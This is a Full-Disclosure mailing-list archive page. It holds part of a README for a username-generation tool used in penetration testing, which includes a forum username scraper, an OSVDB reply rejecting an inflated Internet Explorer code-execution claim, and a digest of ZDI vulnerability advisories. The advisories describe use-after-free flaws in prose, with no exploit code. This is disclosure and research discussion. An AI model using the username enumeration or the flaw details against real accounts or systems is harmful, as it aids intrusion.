### Example 3
Mixed set of names

firstname,firstinitial,middleinitial,lastname,lastinitial
andrew,,,horton,
jim,,,,v
,p,,o'toole,

Custom Plugins
--------------
### Command line Plugins
Define a custom plugin format using either the ABK or format string format.
Specify the username format with -F or --format

#### Example 1

./username-anarchy -F "v-annakey" andrew horton
v-andrewhorton

#### Example 2

./username-anarchy -F "v-%f%l" -a -C poland
v-nowaksmith
v-nowakjohnson
v-nowakjones
v-nowakwilliams
v-nowakbrown
v-nowaklee
v-nowakkhan
v-nowaksingh
v-nowakkumar
v-nowakmiller
...

### Writing Plugins
You can add plugins to username anarchy by defining them in format-plugins.rb

This example uses the ABK format.

Plugin.define "last.first" do
def generate(n)
n.format_anna("key.anna")
end
end

This example uses the format string format.

Plugin.define "first" do
def generate(n)
n.format("%f")
end
end

### Format Strings
Username Anarchy provides a method of defining a username format with format strings.

* %F - Firstname
* %M - Middlename
* %L - Lastname
* %f - firstname
* %m - middlename
* %l - lastname
* %i.f - first initial
* %i.m - middle initial
* %i.l - last initial
* %i.F - First initial
* %i.M - Middle initial
* %i.L - Last initial
* %D - Digit range 0..9
* %DD - Digit range 00..99

### ABK Format
Username Anarchy provides a method of defining a username format with ABK format which translates
to format strings.

* Anna - %F
* Boom - %M
* Key - %L
* anna - %f
* boom - %m
* key - %l
* A - %i.F
* B - %i.M
* K - %i.L
* a - %i.f
* b - %i.m
* k - %i.l

Forum Usernames
---------------
The forum-names folder contains:
* common-forum-names.csv - A CSV file with forum names and the frequency they appeared with
* common-forum-names-top10k.txt - The top 10,000 forum names
* common-forum-names.txt - 1,774,313 forum names
* phpbb-scraper.rb - a web scraper for usernames on PHPbb forums

Name Resources
--------------

### Names
* [worldnames.publicprofiler.org] Some common countries. Top 10 surnames and
forenames
* [secure.wikimedia.org]
* [www.babynamefacts.com] top 100 baby names per country
* [secure.wikimedia.org]

### Name Parsing:
* [secure.wikimedia.org]
* [cpansearch.perl.org]
* [search.cpan.org]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Competitively priced drop box for pentesters (1 reply)

Almaz — Sat, 22 Dec 2012 15:45:09 +0800

[twitter.com]

--
Almantas Kakareka, CISSP, GSNA, GSEC, CEH
CTO
Demyo, Inc.
Miami, FL, USA
Cell: +1 201 665 6666
Desk: +1 786 203 3948
Email: almaz@demyo.com
Twitter: @DemyoSec <[twitter.com];
Web: www.demyo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

Re: [Full-disclosure] [OSVDB Mods] Fwd: Internet Explorer Stack Exhaustion -> Flag [MSIE9] (fwd) (no replies)

security curmudgeon — Sat, 22 Dec 2012 00:18:38 +0800

---------- Forwarded message ----------
From: security curmudgeon
To: dukkha@Safe-mail.net
Cc: moderators@osvdb.org
Date: Fri, 21 Dec 2012 04:32:31 -0600 (CST)
Subject: Re: [OSVDB Mods] Fwd: Internet Explorer Stack Exhaustion -> Flag
[MSIE9]

On Fri, 21 Dec 2012, dukkha@Safe-mail.net wrote:

: regarding to this vulnerability:
:
: [osvdb.org]
:
: Why has this been flagged as "myth/fake"?

Because your claims of code execution are wrong.

: Paste the payload in a file, save it as "test.html" and run it in Internet Explorer:
:
:
:
:

:
: It will cause a crash.

Yes, it will cause a crash.

: Use a debugger, you will see this is a stack exhaustion.

Yes, stack exhaustion leads to a crash.

: Also, if you have any basic knowledge, take a look at the registers (ESP
: 003FDDD4 = Stack Exhaustion). There is no myth and no fake. I would like
: to receive a statement why this has been flagged. If there is no reason,
: please remove the message that this is a "myth/fake".

Our official statement:

You claimed code execution in your post. In case you forgot, let me
remind and clarify:

[seclists.org]
"Successful exploitation may lead to arbitrary code execution."

This is inaccurate. Thus, we have flagged the entry "Myth/Fake" because
stack exhaustion leads to a crash, not code execution. There is a
difference between a stack overflow (exhaustion) that crashes, and a
stack-based buffer overflow that *may* lead to code execution. You have
only proven stack exhaustion and a random crash. This is a common mistake
among new "researchers".

Your mail to us now about stack exhaustion is different than your initial
post to Full-Disclosure. Your post to F-D was a) lacking relevant details
to make sense of b) very different than your email to us. You need to
figure out what details you think you found out, and stick to them.
Posting apples and mailing us claiming aardvarks doesn't fly sir.

You said in your F-D post, "The application is prone to a remote stack
overflow vulnerability." which makes anyone immediately reading it believe
it's a stack-based buffer overflow - especially since you claim it "may
lead to arbitrary code execution". Your PoC does not demonstrate anything
other than a straightforward crash (a stack overflow exception -
0xc00000fd).

Further, you titled this "Microsoft Internet Explorer 9.x <= Remote Stack
Overflow Vulnerability". I am giving you the benefit of the doubt and
assuming you are claiming this in version 9.x, and not implying "less than
or equal to 9.x". But just in case, did you even bother to test on
multiple versions of 9.x? If so, why didn't you specify the exact version?
Did you test before that and notice that MSIE 8 appears to crash, while
MSIE 6 and 7 do not? I mean seriously, listing 9.x without any more
details is amateur hour. I won't even get into the fact that you did not
mention patches, or platform.

If you feel that we are wrong, consider one of the replies to your post:

[seclists.org]

From: Fabio Baroni
Date: Thu, 20 Dec 2012 01:05:07 +0100

Jonathan Ness from the Microsoft Security Response Center says this
IE9 POC is stack exhaustion, not a stack-based buffer overflow and
Stack exhaustion is typically not exploitable for code execution.

That is now two people that dispute your finding, yet you seem to think
you know more than anyone while only posting the most pedestrian of
advisories. While you can cry that you want to read Ness' statement,
remember that you have published NOTHING other than a simple crash. You
have not demonstrated anything else, and certainly not demonstrated code
execution.

You said to us, "Also, if you have any basic knowledge...", I would like
to say that I believe OSVDB staff have more than basic knowledge. However,
based on your F-D post, you don't get access to our reversing ninja. Based
on the crap you posted, you only get access to me and my guinea pigs.
Waffle and Tater aren't that good at reversing, but they can usually smell
suspicious bullshit, as demonstrated when I try to hand feed them a
vegetable in a desperate ploy to grab one for "mandatory pet time". Until
you show that YOU have basic knowledge, you only get to deal with two
guinea pigs and a washed up, bitter ex-penetration tester. For now, the
entry remains Myth/Fake.

The easiest way for you to get us to change our entry, is for you to a)
demonstrate code execution or b) get the vendor to admit code execution is
possible. If you can demonstrate code execution off this particular bug, I
will Paypal you US$250 just for proving me wrong.

Jericho

p.s. Our database has 87510 entries, and only 401 are marked as Myth/Fake.
Congrats, for making the very few!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

Re: [Full-disclosure] ZDI Anything (1 reply)

Anonymous User — Fri, 21 Dec 2012 23:52:47 +0800

Ah, more of the one-third disclosures, or somewhat-disclosed-but-not-really disclosure best of breed pony parade i see. Does nobody else find their posts tedious and annoying? I prefer mustlive any day

On 12/21/12 4:43 AM full-disclosure-request@lists.grok.org.uk wrote:

Send Full-Disclosure mailing list submissions to

full-disclosure@lists.grok.org.uk

To subscribe or unsubscribe via the World Wide Web, visit

[lists.grok.org.uk]

or, via email, send a message with subject or body 'help' to

full-disclosure@lists.grok.org.uk

You can reach the person managing the list at

full-disclosure@lists.grok.org.uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."

Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.

Today's Topics:

1. ZDI-12-188 : Microsoft Internet Explorer OnRowsInserted Event
Remote Code Execution Vulnerability (ZDI Disclosures)
2. ZDI-12-189 : Oracle Java WebStart Changing System Properties
Remote Code Execution Vulnerability (ZDI Disclosures)
3. ZDI-12-190 : Microsoft Internet Explorer Title Element Change
Remote Code Execution Vulnerability (ZDI Disclosures)
4. ZDI-12-191 : Webkit HTMLMedia Element beforeLoad Remote Code
Execution Vulnerability (ZDI Disclosures)
5. ZDI-12-192 : Microsoft Internet Explorer insertRow Remote
Code Execution Vulnerability (ZDI Disclosures)
6. ZDI-12-193 : Microsoft Internet Explorer insertAdjacentText
Remote Code Execution Vulnerability (ZDI Disclosures)
7. ZDI-12-194 : Microsoft Internet Explorer OnBeforeDeactivate
Event Remote Code Execution Vulnerability (ZDI Disclosures)
8. ZDI-12-195 : RealNetworks RealPlayer ATRAC Sample Decoding
Remote Code Execution Vulnerability (ZDI Disclosures)
9. ZDI-12-196 : Novell Groupwise GWIA ber_get_stringa Remote
Code Execution Vulnerability (ZDI Disclosures)
10. ZDI-12-197 : Oracle Java java.beans.Statement Remote Code
Execution Vulnerability (ZDI Disclosures)

----------------------------------------------------------------------

Message: 1
Date: Fri, 21 Dec 2012 06:29:33 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-188 : Microsoft Internet Explorer
OnRowsInserted Event Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

Cc: full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-188 : Microsoft Internet Explorer OnRowsInserted Event Remote Code
Execution Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1881

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles
'onrowsinserted' callback functions for certain elements. It is possible to
alter the document DOM tree in a onrowsinserted callback function which can
lead to a use-after-free condition when the function returns. This can
result in remote code execution under the context of the current process.

- -- Vendor Response:
Microsoft states:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRWElVtgMGTo1scAQLRbQgAqGyxowWyS6ENL3tdOoUpU3QxweD2KGcW
rrYxmRKfZxIOw8dtXe/CPLw+ANGLy8y0IfMD2JAgTwqigzjOsLvxXJx77827jjkZ
D5FvAe4CWWXSiQQlN7b+VKDldvqH18FPSMSiKW+nAX5Pi6RwnK7xMdq4f/fyj1tu
0f/N271a4PB83wICFJT8GbB3xM2CEObMs5sEYd3GAF6i0snn9DZGHF+PVdaqmFXD
scBVoqVHGW2EeePeRkGWaVJIGG2b4kV0vzFoIXeyZ5e24cJ5fmeTQPsPOtcVDRec
eA6WqHdWSRGWPYSjTU3AQUTfaVdzXZmTFet4VvtO0/a6Qq3aPDh/PQ==
=EDil
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 2
Date: Fri, 21 Dec 2012 06:31:01 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-189 : Oracle Java WebStart Changing
System Properties Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-189 : Oracle Java WebStart Changing System Properties Remote Code
Execution Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1721

- -- CVSS:
9, AV:N/AC:L/Au:N/C:P/I:P/A:C

- -- Affected Vendors:
Oracle

- -- Affected Products:
Oracle Java Runtime

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Java. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page
or open a malicious file.

The specific flaw exists because it is possible to change system properties
through trusted JNLP files. If a JNLP file requests ""
and only references signed, trusted JAR files, it can set all System
properties. By referencing a trusted JNLP file from an untrusted one it is
possible to change System Properties that can lead to remote code execution
under the context of the current user.

- -- Vendor Response:
Oracle has issued an update to correct this vulnerability. More details can
be found at:

[lists.grok.org.uk]

ml

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Chris Ries

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRWf1VtgMGTo1scAQL17Af+PLKQVLcU5Y6zbxi8z9zDy8lZV/qhycKN
nSRaC5SOh+aVBVN3hvRc8LkRpD1me4kWLk5uvfP4dV9yZToRCt1dZOvIFBgJOYdd
ztiOTFgQCGapxv4bdvI9VRvx9bUzO8Rl2k3L32xV1gLpe9UKiQbJw5qC8SbhYqWY
8j4JA03/66hyTZqT+M6tWKtB80P2lCuYp4aoF6kcIn//5tyS4h0RgPWRTaxzmBcU
p6V2m3rxDpaTyPRZxN7Q9c8JvN3ClWla1gcNdYAFsh7bnYgiOeI4cvk0vY6v312s
+3gKQKsU2w+Its1gekAIEk11tlyR3SRtd/mFnk4fEzvlhkSjytAvgQ==
=VL7/
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 3
Date: Fri, 21 Dec 2012 06:32:34 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-190 : Microsoft Internet Explorer
Title Element Change Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-190 : Microsoft Internet Explorer Title Element Change Remote Code
Execution Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1877

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer 9

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12385.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists in the 'onpropertychange' user callback function
for the document.title. If the function changes the document in the
callback function by using, for example, a document.write call, this can
result in a use-after-free vulnerability. This can lead to remote code
execution under the context of the program.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRW21VtgMGTo1scAQKc7gf+OEjWyyQYkCYucuwZivLId/up2Px3MbYR
omQMFCjxijYj0rx77RRQGBcPC8ROhW6Gt9VEA+C86gi1hynG/zTEz+AA6iRxJVfp
6fUmWVL119kh6tcQml4Mz49vjz1tV9zaALpK/jv7V1EuQ7nS5oSbAi4H0M9oXmLX
Fht71iOmiFvrnWj+rSZOYJ7Ctd2+DHLGrR72kYEgtU2SLm3cGgJqiEHbbjq/Y7J6
Ba2Y8mHEJKvdpx3012zJ7BrU0ZOUKRhiiibtJj1A+KAX5fwc+TS5mGMGXgTY/WVe
sr7diAuRz+R1Uuv1n8ieiV3SuUNcy7NmPlvsXa4VJQsEvB7I9QQIXA==
=aqcy
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 4
Date: Fri, 21 Dec 2012 06:34:41 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-191 : Webkit HTMLMedia Element
beforeLoad Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-191 : Webkit HTMLMedia Element beforeLoad Remote Code Execution
Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2011-3071

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
WebKit.Org

- -- Affected Products:
WebKit.Org WebKit

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12492.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Safari Webkit. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the library's implementation of a HTMLMedia
element. After a source element is created, an attacker can catch the
beforeLoad event before the element is used, and delete the element. The
pointer to the source element will then be referenced causing a
use-after-free condition, which can lead to code execution under the
context of the application.

- -- Vendor Response:
WebKit.Org has issued an update to correct this vulnerability. More details
can be found at:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* pa_kt / twitter.com/pa_kt

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRXVlVtgMGTo1scAQL8swgAm/RnsOnH3MOpjeTII0WcvV9txZO0itaC
yRlwICYXXHUUVvuSxlN8KS7P6Wmf5F0gj+VQXP647KhCxIhXZsrx+DL+aZS+Fb17
pcHGwZFhntNNPn5Gwgy8c0cZeSBVmGByU5BBDT6e3ciGpyidlAzUOga63ahOKN22
HSi4uiwHn4WX4gxpLt0Yyd14Ro1fdtqi7puUc+KGuzVtBwWypv023ubuPz/qRZ85
L9R+n+SfoCHL/o2kEHaoM3xpRQeKiAkxRCwS7SVGq8ltnckI3kkdl38t3SfxmjIQ
yAsYkKbYIkZgHbFhFPfffNhBa8YSdcp4YTMjH2Cjqbrh2TElnhH7Jg==
=FjqC
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 5
Date: Fri, 21 Dec 2012 06:36:00 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-192 : Microsoft Internet Explorer
insertRow Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-192 : Microsoft Internet Explorer insertRow Remote Code Execution
Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1880

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12382.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles
consecutive calls to insertRow. When the number of rows reaches a certain
threshold the program fails to correctly relocate certain key objects. This
can lead to a use-after-free vulnerability which can result in remote code
execution under the context of the current process.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRXqlVtgMGTo1scAQIolwgAlfWawonK1BetraIK8viDhg/z4Eb5RTse
hOfWDOxNdY0glskLeI1ylrtr0nXJSvj+8q5T6DcsEaz48nEdsv/ObO+d6JREzwTL
3gUJ9fUeMWZubmUmm2cKkgdenmEkK0p8EZqQ5puUpuVffeFC/f8Dn679MGlwL73v
Zato0rHoJuBedfxOYsQ+UkYwre97ickYkw/dl0LMgce5IRxKROnsR3u4+yPUVOWt
Vqo0zEPXKGdPUY3L/AjgowwqvOGsf0OmQESBLZi+pGhO2PxWjb5aBm+gFPBkRpNl
ON1yduQfblrmsrCEHZf/od/A/r7YyLeI4dxkOGb0vR7FmBr2OcZfBA==
=/GjQ
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 6
Date: Fri, 21 Dec 2012 06:37:28 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-193 : Microsoft Internet Explorer
insertAdjacentText Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-193 : Microsoft Internet Explorer insertAdjacentText Remote Code
Execution Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1879

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12383.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles repeated
calls to insertAdjacentText. When the size of the element reaches a certain
threshold Internet Explorer fails to correctly relocate key elements. An
unitialized variable in one of the function can cause memory corruption.
This can lead to remote code execution under the context of the program.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRYAlVtgMGTo1scAQLIzwgAifwtcC6Rt0S7xdrcLHpBiw+vrM598Ccl
UBkbArcNGipQLDGVgW6sC3h0gPGayQbaQsyW8J1ar6MNUWmfKnEJetAUa24ZgDWl
cOATZkDyf0HYwV6a+gATJA4CVJk6cHYjf4Pn9vkguogBebsBMX3mGBLsrSfbcxQc
1tOfbV7VogCOHceFLNxVx8Ir8/rpHfbfduflYFPbSLcKgcERcLq5kGJOZkiNPRID
kRs8dd6vfjEyueO5/NwyPXi9mNaDqNCYgelRCGi3xF/FjabtuV3BVbS81NDoJ8Ak
O3VFfeHisnRN/ZvPs84fEdfWG5lDy5fzNgEtsTP4+zOMfws21I/7uA==
=2V0z
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 7
Date: Fri, 21 Dec 2012 06:39:02 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-194 : Microsoft Internet Explorer
OnBeforeDeactivate Event Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-194 : Microsoft Internet Explorer OnBeforeDeactivate Event Remote
Code Execution Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1878

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12388.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles the
onbeforedeactivate callback function for certain elements. During the
execution of the onbeforedeactivate callback function it is possible to
alter the DOM tree of the page which can lead to a use-after-free
vulnerability when the function returns. This can result in remote code
execution under the context of the current process.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:

